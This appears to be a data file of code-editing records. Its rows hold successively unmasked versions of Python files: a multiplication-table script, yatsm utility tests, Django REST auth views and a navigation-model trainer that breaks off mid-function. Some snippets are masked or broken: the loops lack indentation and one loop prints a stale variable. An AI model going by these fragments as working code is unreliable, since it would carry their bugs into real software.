| tablenumber = int(input('Enter a number: '))
upperlimit = int(input('Enter a upper limit: '))
lowerlimit = int(input('Enter a lower limit: '))
i = upperlimit
while i <= lowerlimit:
print(i, '*', tablenumber, '=', i * tablenumber)
i = i + 1
print('=======================================================')
tablenumber = int(input('Enter a number: '))
upperlimit = int(input('Enter a upper limit: '))
lowerlimit = int(input('Enter a lower limit: '))
for foreachnumber in range(upperlimit, lowerlimit + 1):
    print(foreachnumber, '*', tablenumber, '=', foreachnumber * tablenumber)
print('=======================================================')
| #Print table using while loop
tablenumber = int(input("Enter a number: "))
upperlimit = int(input("Enter a upper limit: "))
lowerlimit = int(input("Enter a lower limit: "))
i = upperlimit
while (i <= lowerlimit):
print (i,"*",tablenumber,"=",i*tablenumber)
i=i+1
print("=======================================================")
#Printing table using for loop
tablenumber = int(input("Enter a number: "))
upperlimit = int(input("Enter a upper limit: "))
lowerlimit = int(input("Enter a lower limit: "))
for foreachnumber in range(upperlimit, lowerlimit+1):
print (i,"*",tablenumber,"=",i*tablenumber)
print("=======================================================")
| null | [
0,
1,
2,
3
] |
640 | a513dfd84b5d9267b7e96fedc88e5b6dabeea19e | <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
<mask token>
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
<mask token>
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_success_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_success_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| <mask token>
import numpy as np
import pytest
from yatsm import utils
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_success_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
@pytest.mark.parametrize(('dtypes', 'ans'), [((np.uint8, np.int16), np.
int16), ((np.uint8, np.uint16, np.int16), np.int32), ((np.uint8, np.
uint16, np.int16, np.float), np.float), ((np.uint8, np.float16, np.
float32, np.float64), np.float64)])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
| """ Tests for `yatsm.utils`
"""
import numpy as np
import pytest
from yatsm import utils
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_interlaced(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=True))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(793, 13), (700, 1), (700, 700)])
def test_distribute_jobs_sequential(nrow, njob):
assigned = []
for i in range(njob):
assigned.extend(utils.distribute_jobs(i, njob, nrow, interlaced=False))
assigned = np.sort(np.asarray(assigned))
all_rows = np.arange(0, nrow)
np.testing.assert_equal(assigned, all_rows)
@pytest.mark.parametrize('nrow,njob', [(700, 1)])
def test_distribute_jobs_sequential_onejob(nrow, njob):
with pytest.raises(ValueError):
utils.distribute_jobs(nrow, nrow, njob, interlaced=False)
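# Semantics illustrated (hypothetical numbers, inferred from the tests above):
# with nrow=7 and njob=3, interlaced=True assigns job i every njob-th row
# (job 0 -> rows 0, 3, 6) while interlaced=False hands out contiguous chunks
# (job 0 -> rows 0, 1, 2); either way the union over all jobs is range(nrow).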
# mkdir_p
def test_mkdir_p_success(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_success_exists(tmpdir):
utils.mkdir_p(tmpdir.join('test').strpath)
utils.mkdir_p(tmpdir.join('test').strpath)
def test_mkdir_p_failure_permission(tmpdir):
with pytest.raises(OSError):
utils.mkdir_p('/asdf')
# np_promote_all_types
@pytest.mark.parametrize(('dtypes', 'ans'), [
((np.uint8, np.int16), np.int16),
((np.uint8, np.uint16, np.int16), np.int32),
((np.uint8, np.uint16, np.int16, np.float), np.float),
((np.uint8, np.float16, np.float32, np.float64), np.float64),
])
def test_np_promote_all_types(dtypes, ans):
test_ans = utils.np_promote_all_types(*dtypes)
assert test_ans == ans
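# For orientation: np.promote_types(np.uint8, np.int16) is int16, but adding
# uint16 forces int32, since no 16-bit dtype holds both the uint16 and int16
# ranges -- which is exactly what the parametrized cases above assert.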
| [
4,
6,
7,
8,
9
] |
641 | 6a5a6bdb0740d51426aa8b36dd3cc317103412b1 | <mask token>
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| <mask token>
class RegistrationView(APIView):
<mask token>
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| <mask token>
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
| from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
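# Minimal wiring sketch (hypothetical urls.py, not part of this module):
# from django.urls import path
# from .views import RegistrationView, LogoutView
# urlpatterns = [
#     path('register/', RegistrationView.as_view()),
#     path('logout/', LogoutView.as_view()),
# ]
# A successful POST to register/ returns {"response": ..., "key": <token>};
# the Token row is assumed to be created elsewhere (e.g. a post_save signal),
# which is why the view fetches it with get_object_or_404 instead of creating it.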
| from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self,request):
serilizer = UserSerializer(data= request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = { 'response': "user with username " + str(user_name) + ' created'}
data['key'] = get_object_or_404(Token,user = account).key
return Response( data ,status = status.HTTP_201_CREATED )
else :
return Response(serilizer.errors,status = status.HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self,request):
logout(request)
return Response({"response" : "logged out"},status=status.HTTP_200_OK) | [
2,
4,
5,
6,
7
] |
642 | 04aacf9461ade2e229076ffdf85aca913037edad | <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # guard the sentinel comparison: the defaults are None, and None < 0
        # raises TypeError in Python 3
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
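    # e.g. (hypothetical sizes) a batch of 40 instances with batch_size=16
    # yields sub-batches of 16, 16 and 8; every key is sliced with the same
    # indices, so instances stay aligned across the sub-batch tensors.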
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
                score_dict = self.validate(small_batch, epoch, b, 0,
                    self.debug_image_top_k, self.debug_image_threshold)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
        compute the per-patch loss: each patch is labelled 1 if any path pixel falls inside it, 0 otherwise
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
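    # Shape sketch (hypothetical sizes): with a 512x512 mask and patch_size=8,
    # image_to_tiles yields (bsz, 4096, 64) -- 64x64 patches of 8x8 pixels --
    # and summing over the last dim then binarizing gives one {0,1} label per
    # patch, so the weighted cross-entropy runs over 4096 patch predictions.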
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
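    # Note on the top_k branch above: softmax outputs never exceed 1.0, so
    # marking the k largest entries with the sentinel 1.1 lets one threshold
    # zero out everything else before the sentinels are reset to exactly 1.0.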
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
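    # Worked micro-example (hypothetical counts): if 3 pixels are predicted on,
    # 2 of them correctly, and the true path has 4 pixels, then true_pos=2,
    # false_pos=1, false_neg=2, giving precision=2/3, recall=1/2 and
    # f1 = 2*(2/3)*(1/2) / (2/3 + 1/2) = 4/7 ~= 0.571 (eps keeps this finite).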
<mask token>
| <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # guard the sentinel comparison: the defaults are None, and None < 0
        # raises TypeError in Python 3
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
                score_dict = self.validate(small_batch, epoch, b, 0,
                    self.debug_image_top_k, self.debug_image_threshold)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
        compute the per-patch loss: each patch is labelled 1 if any path pixel falls inside it, 0 otherwise
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
